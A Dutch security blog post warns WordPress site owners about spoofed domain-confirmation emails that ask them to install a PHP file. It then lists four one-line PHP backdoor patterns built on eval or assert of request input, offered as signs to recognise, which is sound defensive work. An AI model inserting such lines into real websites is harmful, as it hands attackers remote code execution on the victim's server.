Security Blog
Security Blog

Heeft die nep-domein bevestiging e-mails niet te vertrouwen

Als u ooit een brief ontvangt van welke aard dan ook die verzoekt om enige PHP-code op uw website te maken, te downloaden of te installeren, moet u deze negeren


English version: Do not trust those fake domain confirmation emails


Onlangs ontvingen sommige van mijn klanten vreemde e-mailbrieven van hun domeinregistreerders. Die brieven bevatten een verzoek om eigen bevestigingsdomeinen. Ik controleerde een van die brieven en identificeerde het snel als een frauduleuze brief . Alle letters hebben een identiek patroon en een verzoek om een PHP-bestand te maken in de hoofdmap op een website met een specifieke naam en de gegeven inhoud. Het is onnodig om te zeggen dat de voorgestelde inhoud voor dat PHP-bestand schadelijke code bevat die bekend staat als backdoor-code. Met dit soort code kan de aanvaller elke gewenste actie uitvoeren op de website van een slachtoffer.

Als u ooit een brief ontvangt van welke aard dan ook die verzoekt om enige PHP-code op uw website te maken, te downloaden of te installeren, moet u deze negeren. Geen uitzonderingen. Zelfs als de brief van de president of je moeder komt.

Frauduleuze brieven lijken legitiem vanwege legitiem Van e-mailadres . Maar het is een e-mail spoofing. U verwacht geen valse e-mail van uw vrienden of uw domeinregistreerder te ontvangen. Rechts? Nee! Elke e-mailbrief kan elk Van-e-mailadres bevatten. De overgrote meerderheid van e-mailservers en e-mailclients controleren of verifiëren het afzenderadres niet. Dus je ziet het als een gezochte hacker. U moet geen enkele e-mailbrief vertrouwen die u van een bekende afzender hebt ontvangen als de brief een verzoek bevat voor verdachte actie, zoals het installeren van code op uw website of toepassing op uw computer.

Technische details

Valse e-mails bevatten meestal enkele van de volgende PHP-regels.

assert(stripslashes($_REQUEST['something']));

eval(stripslashes($_REQUEST['something']));

assert(base64_decode($_REQUEST['something']));

eval(base64_decode($_REQUEST['something']));

Ter info: base64_decode, eval en assert zijn bekende markers van verdachte of kwaadwillige PHP-code.

Zie ook: Plugin Inspector onthult beveiligingsproblemen met andere plug-ins

Last posts from WordPress security blog


I'm a team lead in Cerber Tech. I'm a software & database architect, WordPress - PHP - SQL - JavaScript developer. I started coding in 1993 on IBM System/370 (yeah, that was amazing days) and today software engineering at Cerber Tech is how I make my living. I've taught to have high standards for myself as well as using them in developing software solutions.

View Comments
There are currently no comments.